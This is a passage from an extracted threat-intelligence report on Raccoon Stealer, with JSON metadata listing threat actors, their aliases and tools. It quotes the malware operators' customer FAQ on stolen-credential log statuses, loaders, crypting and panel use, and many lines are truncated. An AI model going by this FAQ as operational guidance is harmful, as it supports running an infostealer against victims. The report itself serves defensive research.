statuses mean?\r\nA15: \"NEW\" - new log which has not been opened or downloaded yet.\r\n \"OPEN\" - log which one was opened or downloaded (or you viewed passwords/links/cookies).\r\n \"DOUBLE\" - someone in the panel has the same log. So it may mean your traffic was sold to many hands.\r\n \"TEST\" - test log from our virtual machine. - Deprecated\r\n \"VM\" - log from VM (this function in demo mode now). - Deprecated\r\nQ16. I'm receiving so many EMPTY logs. Why?\r\nA16: 1. Stealer knocks to the gate on the start of his work.\r\n 2. \"EMPTY\" log will appear in your panel.\r\n 3. Soft collects data and sends archive to the gate.\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 17 of 18\n\n4. Panel parse data from log and give log status \"NEW\".\r\n If after some time status has not changed, Raccoon died in the battle with antivirus. Or upload speed on th\r\nQ17. Can you share contacts of crypt, traffic or install guys?\r\nA17. We are working on support and updates only. We can not guarantee successful work of people who sell certain\r\nQ18. I have a logs store and I need CSV table for it.\r\nA18: On the top of the logs tab you can see \"CSV\" button. Feel free to use it.\r\nQ19. I can't download all logs at once, what should I do?\r\nA19. In case of high load, the multi-download process may fail. Please download less then 2000 logs per multi-do\r\nQ20. What if I have issues with particular log?\r\nA20: Place your mouse arrow on the date of log, you \"Bot ID\" of this log. Send this information to one of our su\r\nQ21. How do you monitor the status of your system?\r\nA21. We have set up alarm system for all important nodes. We track AV detects and health of our gates and make d\r\nQ22. What influences my ratio?\r\nA22. There are a lot of factors that affect ratio. From crypt to methods of spreading your malware. Also your co\r\nQ23. What maximum file size can Raccoon grab?\r\nA23. 100 Mb\r\nQ24. Can I host your panel on my server?\r\nA24. No for all.\r\nQ25. What will happen with my logs if my license time is over?\r\nA25. We are not responsible for logs stored in our panel for more than 2 months. Logs of inactive clients are de\r\nQ26. Can I load multiple files with your loader option?\r\nA26. Yes you can.\r\nQ27. Where can I leave my wishes about work of your soft and panel?\r\nA27. Please contact our support. We also give constant consideration to our customers' ideas.\r\nQ28. I am receiving API Error.\r\nA28. This is happen due to that back-end and front-end hosts on separate servers and your node doesn't receive o\r\nReferences\r\n[1] https://www.cyberark.com/resources/threat-research-blog/raccoon-the-story-of-a-typical-infostealer\r\nSource: https://cyberint.com/blog/financial-services/raccoon-stealer/\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cyberint.com/blog/financial-services/raccoon-stealer/" ], "report_names": [ "raccoon-stealer" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434259, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c0dfd25d62f8d7bf789a3bce879ccd046bed2167.pdf", "text": "https://archive.orkl.eu/c0dfd25d62f8d7bf789a3bce879ccd046bed2167.txt", "img": "https://archive.orkl.eu/c0dfd25d62f8d7bf789a3bce879ccd046bed2167.jpg" } }